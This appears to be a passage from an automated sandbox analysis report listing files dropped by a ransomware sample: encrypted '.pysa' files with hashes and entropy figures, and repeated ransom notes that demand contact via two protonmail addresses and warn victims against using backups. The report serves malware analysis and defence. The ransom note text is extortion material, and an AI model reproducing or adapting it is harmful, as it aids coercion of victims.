                  Preview: o.....BG.....G....{.ii)G.0.z%..{j.%.....bmy.&p.+.jb......1...bu.fX..Ea..f-..<...:.I...woO...^.Ie.t..........j.tU_my.0.m7..H...b.q..6..F.....+.......8.%gu.q...Y../:...V.@...R~.A..L..~]xX<.u.F..S...\j.W.{.90.W...k.l.q....!.....<..I......K...^..E...\L........O+h...ws....z<pm....$.9v.5.j.y._....?....O..}....f.F.#..U.T+.ao8N..[."...,.+.}z...~...}......x|3..>*.&@......y....af.D.G.....$...>~..O...F@7....yda.<..2....M.1e....y..Q.Is;pG..;.o.....6.....xNu...t.[.?....8$..u..j...Y8..3]...5.?..&.2....C.&S.h......#...U.d....4.g......W...}.... w..L.....n... ...l....OP.........vKr.Q.v....W....3Z..%-..f....J.....B.F..D..%.....9L.<r....d.w...x=........&.....=.02..>`....Np.<.t....k]2...6.h...5>^T.....Z.'......*..L. Y.[H4ft@..F5g...E...]M[..w....u.$....."g..x..._.)...P,.x.\...\$.|..*...i....a(.z=..a.?.V..vV.y.X9H. .fnp...T.....)D....0b.....f..i....z.)..m..2..6....O.&9..U...qgx....1.....!.%cy.=*.l.C.g...cu.i..LY.p.L[BYa...W..dr..*...a...Ji..J..#|.s.
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3074048
                  Entropy (8bit):7.99993040369862
                  Encrypted:true
                  SSDEEP:49152:p2l+mL4S75KwMyr+OtOatFQ5mUb5l0tK7ISrnPsOPNVQuuAPN3bfJRrHrbJY1E9N:pmt5KwMytOw+byoPsCQpM1FRLbMELhN
                  MD5:3BB61023B965AC8D44A35137B8934A06
                  SHA1:491799086DAE3D57136A62602BF1534467286529
                  SHA-256:81A5A19BCBDFE7B3C837796130ED479720C51CC558415B3ECC662043B4DDA310
                  SHA-512:293D1FA296CD005B828C9D1B6881820C0572A821B432636CFFEDB00AF47B5EE0DE787A74E98D49039BE34840D4F1F0BE0746283E967363376279C3A802E9BBBE
                  Malicious:true
                  Preview: o...U..v.n.].[.~.-.....Q.......ft.E.PQ.a...B.C...........'W.h. ...|...._..3.!..m.<.U....4..j..r./..\_R.A.h."(..\J1.....r.J.N..C.E.Q...Zhm(....#8?@..^.....f....w.....<>*..p.....9.e...SF. .r.{..5.!"R........t.F.|%E,L..aVy..^.*D.....N.f.j......1..K.6:.z<..Q.(X...D.l..5.e..4..8..)'...p.l.:...?{.....t.s(.......^}B.r...$..!..B..x..j>).. ..u.c<...k.I..i'.............r._.q.....X>.C2.@r...7Ta=..)G..u.-s.5x...kY."*..D.h.%T.D.u.4...T.... .....3....n..|/L.A..5u...h.E........1.,.0.~...#...8.hsh2.$.A...g.<R...!...).1..........JNz..=/..*.S.....tc.g.~....x....F@dp.....4.*.R...C....3.j3w.T@.....k.~..N..RW.U....kY..4P.....pv..7..J'.x2rb..L@....T4.l#..O!.l...u.4...^...E......Z.1..B.=;..Z.X..S..y..3.GQ....T....(.<..S\kCS`M<..E~.+.........*k...........7.5........L..A@N.; A......x..N.A.2.%..x..U...iy..bT..!..6M..}..X.....;.~;.3q.b.Y...v..y.6yp..L#.........3.....W!......;/........JI.3.b..T.......*...^.....H...5L.|..C.._....)&.{..Iq...f..G...ybB.;v.....h2-y^6......
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3074048
                  Entropy (8bit):7.9999394302453135
                  Encrypted:true
                  SSDEEP:49152:m7zx/4abYqbXhxoS/cZLVkT2k2z9X5ClptkRivywNJ4sIqxh3Hy9FH69Pp:m7zx/pbYqbXhxT/ni9X5+0AxJTIqv3mQ
                  MD5:E71215F62A7896A36A419E7CD0319FF5
                  SHA1:BD7149862B5D8F3BC2CF1676DCB8F2D458C83C35
                  SHA-256:3F432351987B168243408038F58EB5A4C0393BA30D3A4270F3A435CB11E37B49
                  SHA-512:EF247C64BA9CD59F5C7A55474C7C5248DEAB3BA4EEFBCC57C2A53037A010ACAEC27344D76F042AF35C0D38AFAB5F6E87F08083F195EC93173A6199E6C50E8A4D
                  Malicious:true
                  Preview: .."!...X....T.o.N.^_.4.t|.>...7....k..!.0......Ur.U:.q.V..TOE..H%1..g.x....=........'.X?..Oh;a..S.....-|.>\.?,@...5..f$.#......k`.a...W.......'.D.z.(.9..f..l?......`>.P-..^J...uvV......?.%......j..O....F$wl.nIr/...!...&.p./I,T.P.`..81g.....#.z...z....WY.IL7.[....R..'..x.m5...[M..+.eE.._@...cN.m.,@....H...$.=...?,...M.M9......6y.X.sD.YSL..D...E...=.'..E@....6.md.5.....P......h.....6.@.\....%...l:.<y.Zgo......Y...........P.MM.9...h.,....[U...mN"!.GV....|.........7s.n..15......cjJ. .=.....F..d....?....w..oIql..xhV.....I.h)..kas......q....5~.1.`.s.n<U...9o.$.F8. .,.^.z.....ZC....v..r#(rRk..+.'j4.J....@C.....b.*Xw.#c{l'........".....s....>.20#.u<..O......c.G...-q.s_&.n/.s...%..a..ee....u.D Y&).w(q/.....[...J......ox.&..p..A.$b.}....#..YIV5M...o..l..53m.(....|.G..S..|.Sj.Y.&.Jf@...5.....J.!..W!......(.?..UD....e..v........$.Dp..Ux.c..(..j..gj.R.B...lns.Z..#..9.r..j.xo..Y.1J.ulZ.E.|.um.7..JT.cj@.f..-.B,............(...7.q..Bpv.p......ald..Aj.i.j
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3074048
                  Entropy (8bit):7.999934976914003
                  Encrypted:true
                  SSDEEP:49152:YRJQ03Kod78onoiV8jU65m1dUmGWwHOZt1bE9j9lqNI+qEzKFGR9sRqO+avAKx8G:wLKo7ntW5m1bMst1bmlq2+qQKFGRZ4v9
                  MD5:316B2A792C4FB688DB2C6E60A23F4F2C
                  SHA1:DE4A730E97540DDDF4D5EB93EDBCEBC6833D6943
                  SHA-256:E7A8F7B2CC45D619FFAFEE2419B2B0750D4D9725A07F388E1AEA65CC1E273FED
                  SHA-512:2B6982A6855957CA75E515918FA01E2CF56B6A6A84636E2C26A1EA436BB899237AB6EA06078339AD15AA4A87D24C5940E459E08122E188F9DB54DAD00B8F9DD4
                  Malicious:true
                  Preview: @tYY.I..Z..?..Ad..B^.....l.-^x2..._...(.|k.V..(........r.<.....k.G..N^%f.....\...)....e.......k)....(7.'..K.t..+..q...O.W.sX...P..y.x.dg.j...Fo?tD.B.....yh..,.....~....F.|))..^*8........g.,.z.Y.~.!.....kL.e'..itc...j..e........8\....m..qa.ecg.SH...W..|...j^....Cn&T..90cs.o....6S.b./...O..........g.....C("N-.."......P..;H^...}.z..K..<...}.I...^.qBg..y.C<../...:...u.8L^..7....*Xd"R.yX~I...o...jZ..4...F.N#.'9.\..z....6.K[..]rO.W..T....hb.#.&..<.p.KQ...j..+..D.L|:1Y......p.+.G..i.....9..Y.;.......>\..I.[...Y.zS........i..9K.,..D.|.2=d.6.... .~[..7..E.z...Y.j.9..]>B.H.C..7.k....f..{.H.....j.t+..i.q.2.....`..m..d.....r"..:..M.G..g...Z.....=..Z(..vx...*k..@DR.wi4[......`.W;Q.W+...a....O.I....NCc4..P.'...S.y.s.q..b..o.G8.n-u.w{O.LW.v..@r..Y^...KJ......_G.A'.r.t.K..J..ty...~F/...r.......Aw..^.!..=9.......?x..k.}w..=.<#.MqB....c....M.A...G..c.xa.......Z....)7<.f.1i.D@.O....-W6..z.R&..V|* ......V.x...z_>..7C..3(..-V.....,C.........,.}Z.]w.`..or.
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3074048
                  Entropy (8bit):7.999938915544625
                  Encrypted:true
                  SSDEEP:49152:i9KLGbAgtg9caKX7SR0XTtfHzem5rkRcSKr8axhUocxc6d0FVPSB:imGbI+Ck/RptrF5Ts
                  MD5:8734B8477C4ECF4DECC9ECDBCAA2EEB1
                  SHA1:45D4092AE7846457B7437E8F71EDDE51F21304EE
                  SHA-256:E2588C647BD5A14FA4E1EF9A3439437FAB6CB5AB6C4668B553C687FC0FF3E8EF
                  SHA-512:10EEC58D54C7194FF5C76258ADA1C012E51F1D0B54E6AFB8CA8C7A3E1885CA97F82DE0E6AF3978FD406A6F3758F92615C4AAECE0BFC87D45440BD3E9EB67360B
                  Malicious:true
                  Preview: U..P".C4..p...P'..4..6......BZw'..K.U..c....."........5.w ..!!...e?|!.u$....lKD.Z.......H....KA..Y...0I.~...+.S..8(.@XB..B.....'.r.Z:[2.$*..$...s..i...h.Jk.G.....T.t?.S6.*.....*......6......|2.V..z.p....d..*r..kx\...R...........coH.a....3'].T#wL......'....h' q.;.X..x...h.}...._%.&...4 .w..2...N m.pb.s."..V@.W...d,etT....Aa.k.X....S$.....W.2..Bi. U.Q....2....3.4x...F+:.G..0.q.}..F..I...x..ucd....~k..-....#l....-..Y...QX.#U..O....qt. .O.8..~qnQ..Y..h.E..om.`..B6...$%..G..._].A......6....J...c.r..k.....D.G..M.:9%.&9_&.g(..]........+.,K&........(.#.G......O....D.8y.T.e..ab..7%]Q9...W=..G...S|.)+..U..q.>.".Ak.....6....nf.+&.J.m0....73v.8..}..8......j_8Q...4D.@@.._.w..W...].#iA..qP.J0STu.-*..d...T.,..o6.M.}....I.A.%....(6..C,.9Z.a....s..F. y_.U`Je.nv7.......a....v`,....t.....F.E./.G..K.8..S......m...:..7..Y...N.Co... ...6.G..B-.?..}_7...#...E:4MF.s.*.Lm..Dw^..b.b.v.y..de..^.O....\....t....,?.D....wHb.M...... B./..F.>>..RE.Oe...w....9.[.<.1]...V .
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):17408
                  Entropy (8bit):7.882525716677063
                  Encrypted:false
                  SSDEEP:384:dufN4VKdppl3khoLr+FwLESAm/ioa3xhVhG+TuEwkqmbChMVUIYSH3:wfN4wdLlQonLASb83xllrqmxUZW
                  MD5:1155E2E6B12E1855CB58009D169ECA59
                  SHA1:2781E5358B305DDD16C8405D8B4B1116DDFC1735
                  SHA-256:A92A5A29F0650C5EDFD0C4502A8315F10B20B26BA8448A95DE32C25E1D41EB7B
                  SHA-512:4EA272847B3BDB93D9C644806004E04DB6D21248B81AC48CAF10D61D919C07F4FF17ABC03D1FAD37A444C8D2F7D6298B325F5ECDAD5B877428E203C457594818
                  Malicious:false
                  Preview: 0[$....lE.0. ..d6.=....q...>..i.H._4..e..K.....<.h15s%._.....TN....Y._.;s.>{..#..v.?.3.8...o.R..#P.QR?.|.)Z.U...2.5-&t..`..x~..j........s.....L...~..U...$......$.S.............1.X&.|d4..Jg......htxl.>...q wv......F..gU..>z...k.z....e......?._....@m../..T.1......\.MSO.}......[..gg.EZ.3..r...]...Q...[.d.....h.B...'..P...@O.K}D.<K.....l..+.P1..A...z..f.e.p.7.....T....qx9.....M...Q...0|.i..^O` .uQO..L..........,>...Z..(..>f..s.yNb.@..,..DP;.$.:.....:...F..RR....../..6,..i..>..;...q......y.2~k.).g(z.1..m.m...~.C B..:.Z.x...u<...}o.JFT....Y.O...NU.s<..-1)..<..V`.A.....z7J.B. .L.?>.A?.v..f)x....Z<....&UaJZo...L...5..."..m.1>.d....*}.&.......k.6.q.|.|.td_..~A....w....J.T:Q.....p.....Y....7..nB.a.+t..c*.i.4]..T...p.C.bBb.d..`..v.A.p.?.W.&.=-?.....bl...j7L..sW.hE_...L.(i.R............)~.n..jz.WQT....T.&....=..z.FDxMY.v...D......2.....tE....].k(b_.bZ..6..F|x.k......-[8K.=../.y.p....<.......5...j..h.s.Nw ...>.B......M...h|.+jZ|....@..h....T`:vMk
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6248448
                  Entropy (8bit):7.999971536234969
                  Encrypted:true
                  SSDEEP:98304:j72d9S0MQbTvLaQoFwpSwH34pUnyxHuP94JETMXp3xG/nLn3euqrvOVGp1MGVfYj:j72dV3LdoFwbSOCSTM53xG/nLwf3cDu6
                  MD5:D04E04B6251110B36918DF820761943A
                  SHA1:82D58B0748E8311CD13CF56E307D5D5C46612527
                  SHA-256:28D430CF2D0CB3B829A52A2FD6CF6C5E5B5046474DE6DF2188C103D961512A93
                  SHA-512:4156F9476C8C3C00F5596703F5162FB9E54945B0EEC8A39F10B1486EDCCF8B78A8E9C2F51A23BAFCE5842CAEB13F07370DFE9EE56BB31B5202A5BC34BFDBE665
                  Malicious:true
                  Preview: V..F.....y..F.u^.6d_.#f.n.a.L....~..n.G$y4.0P2..x.....~.......4...4I}5k....a?GV.,...~..!~.E+.0..j..o..A...Q...*.o^.....CI~#...a....t..n].).#.EH..v.../.c..tYY.2.M,..kf(u....\.D..u...z.J@.5..J5q.E.......Q..%7h...uX..........@.<.7. ...(E5.\....q.......-.>..j............8.pf.!.>.......VO..,.lf.....hX.r.".8.......V..g...1.<...FE....?..8=9..-Nqh..W...t....g.'.4j.Q...`..=.........^.o.QD...;.f...nF...y.Xy.o9[g......XU..a+.O.?.O.......x...Y=.>............k.....H.;.....N......o`F.....X.........B.....L..'.]..r.y..\,..'x.l7.Z...q........I.....e.Z.(....di.......4K.0E_Y0...~u.G.V.ocA.a...flq~[:.[...!.. ..F..2-~En... F.6.0>;JY..O%Z..20 ....4......~8:.....X5.#I(%.n.......F.*..z.....f..? ..`.......x....._=.._E..........:.......J.,.<..oMI>......s3....%....`...l.^..m..V".^|9.h.V....V..O..9[...FD8f..JS...u.F....y.}.EV.....z.....A.....E.K%....l2.C..A.1..0...d.c@q@..6R.I...>.|y. ....K....../.......l;.q.S.....Z9...U./..3f......W..;X......i.s.H8;?U.a-Z#.r@[`...w..}j.1.?
                  C:\Users\user\AppData\Local\Comms\Unistore\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Comms\Unistore\data\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.063228173161072
                  Encrypted:false
                  SSDEEP:48:GvRy9EcNjv+VvwLliFNrk91umZF+F0Y4Y6SOJHoI90i9zpRnzPqri:xJhv+lwLSpmZFZfSMII3vnui
                  MD5:9D99661199A48B41E351F3B783F593DD
                  SHA1:D0C1644E97150F6A8A5A888C9E860EA7B6C7CF07
                  SHA-256:85F2F50F30CA537B0C886168B9F80389B87979370B59F335B5FBC60E8A46E9EF
                  SHA-512:CF87E10DD2AAEB1A5AD70BDEFFEFCCBD7356D8CE10A2E30D86D1F6E7F3EE3B987C4CEBBE8843DDC1E04032B4190D02F3E8C059427FFB819A96FBCB30E3E34A94
                  Malicious:false
                  Preview: .6Fq...~.e.?.*.0|.?1~0+)]j..m...n..a|z.~d..V......K..9Ql.B.[.8.B.5~.._,...=.0X..zA..xY....~V%.....'...2f...#.h5...{~..4....%.-.7.Hs!....H~>..\.4c..U..^..g......4...%# [i^........c.S..h..C,.../k9..N.:VR,`.d.b.I. ]\7\...2.y.`$,.K....Z.1....|..n,.D.}..<...UW.g>..P..,p..z.......l....p&.4...+...h.?]^...K.;.m.s..!.A.Z....F$2o.#r.a....f...*..h%...)....a..b.$mR...f..O%..f...PE.7.n<..H....W+.......a..v..s.)96.N...B.B.j....G.7...}.Q.".:x...],..)'....MZQ~...\Q.../Q.x/......p\.D...&=...M.6...hH...uo..u3k..%y...zy.y..#b.....Z..J...p...Lsy.OC......#.....b....%...N.." ...U.v.3b.X/..9.O.T...|-.e...i.T......e.F.....$.M....=.a%..8.*o.T.Qk..J...&N......aB....k.J!....]]aG@.yi..........i..bC}.zr.|W.....U..f.|....z............+/^....B..UQ..ve8{,.!w...I...I...<.f..V.a$!O..k...........?.d.0.K/..3b.../w1.i..i].{@.G...j...../...bv.,..@0..a......cOkt+.....Lk.T|f...D.7....Zh..],.%U.[7..?v^.V..}(..(.I...+..=.......}.(3...^e.....k....W...S..].MN....m.....a.H...T\..8eh...~.......|V.
                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\D3DSCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67584
                  Entropy (8bit):7.988715384476508
                  Encrypted:false
                  SSDEEP:1536:4/eCSaZ+YnPOr5BO+69OfaeS/LbEBxaRIh5tWue7LghMc0Yk:42Jv2PaLL69OyeWEu45tUYhjk
                  MD5:205A383408D67FD6BB760555211F0CCC
                  SHA1:984481B71DF8A7B53811EE67D477D55CD6FF105E
                  SHA-256:3F151C958253770ABA2323604DA07954646D537EF235071FF3A0A7B9911B0600
                  SHA-512:054FE963F0F0EA892AC4048A9B17C4458B0BABB7CC98BE637BAFDAA277C7F82AB2347C6D9E1CF6BC4FA9D3D2DD452558BBFA0DFF1147FF3B25DA67E8F8EAF1A6
                  Malicious:false
                  Preview: .....(.......ck.I.....:.s.m7>?$lL...3.J.......mu.....).6.z..P......Z.....0...t. H...k....C.D...UaQO...%|cNCj)..J>s.6}.M.Z...}8......@j.......m.\;.......}+..\.wM..b.\.*.l..c..&.......jb.l`..Y..J.^.2Z...:Dn....e...HFq.k2...(../....ZZ.....55.U,..J...j....0.i.i....bC.k...r...=.t.k.l!1.[o.x.)m.O........F"...C...+..=.W.....SV.Z.K%.....!.iDU-K....q....`.hW..iI..m.!..&....t.)G.n.Q.=..\@..s.R.....92i..q....5k.`....#]t.6..-Q_..}NH..5h...z..]q......:H...[.i..`...g..+.........TTH.s..C..~qK.;P.."r..{.R.........Z0.M(.. ..w.......x..6.......w.......3.n...ki.....5j.!.j;.Fud....Y...@0....x.,k...L.e...N..@x.w.v..2......s...|6X....l.l._.M......Achr...u....i#F.w...P..&...7.?.H..hX.bQ.....E\...,....`...R..."Ky....g.....AQX>..bk..#.3.*...4.y...F.3.46...]...6..B..........f...4...>.8.B....6.f.......b..;k...4.g^..|.qB...o..v...%..9.....U.gnl.1...Qh16.F.i.sq36c..2.6..:.....&L..,.9..q.......m.rF..|+M.efLx.gR..uR.Bl..k...F..B..a...g..$...e0.O.C..u..-.G...%BL.
                  C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.767558396331468
                  Encrypted:false
                  SSDEEP:96:mPI6Cjef5aN1mQU1YDbxBZiYC72QFrTGjdkBkURo1xj:GIvkCmv1YDbViYagOBe1xj
                  MD5:6070682118F304449682F0DA3A0F5EF7
                  SHA1:8A7C62774A570E815FFCC23FAA536BCD96B5F270
                  SHA-256:062903567026572608C4965B20393395CAA65E0BFB877DAA9BCA4812B91099B5
                  SHA-512:555046C2712CAEEEB0E81D14AB1085B3BAEEE3738FAA91AB2AB5252CCCBB12139A0D2B6C78915B06CC8B19DB5FADC321A78B0C0B84F1758ED30C32F6B7169818
                  Malicious:false
                  Preview: ..........m...I.{W./.$B..F.to/&...Ot...O...i..D..q6.6.F..=...2.o30..j......4(.t..g.F..F.....]2..z(a....X..%A....|...^.>...V._..!#..S.5...............E..F.-.....3.a/.......>.q...R....uX.}.....,@..\.m....p.....=..."!.O(G.y.7...8*..2ku.....\.NLI.>.jn)..z..\.@.Q;J......b.:i....!*a.{+.!.eA.......l2..N)R.[;.....FR..QbY...5.?...K{.........I}..mi..,(@.U.DNs{.X\.A.d...c....k(..z...3,.....<g.HJ3....2H[...M.zo..9g..q/U..R...u<...K.#..J.....b._?A.$...O.....}.LAt...n..$..\....l....>...f..6.[k2C:.KH..W........I5.5.....9..u.].p..4..xV..l.e3ZZ..^..[.c...+.M.L....E6....*YB...V..hI..w.b%{..V..../.2..J..ey....F.8.f..$.R..B..J.c.........F8..p.Wv..L:..3nZY.f....]?.y...6.2K..u.../.e..;.1+"...f0L..}6....=.;c.=mF(.].;....;t...........l....;...(...V.l.../......O.._.;...:z....A.F.....1..T.#...6n.x....w...,#..2W..._... .G-5.j.%.../......8.V....eJ...N%....iE.H...(|].....l.w./..k...>....Z .@.(A`.m.j.unAc...&.a.ff!....]..d..h....._.\c....S..w..4.$L.*..7&:..NVC..
                  C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\DBG\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
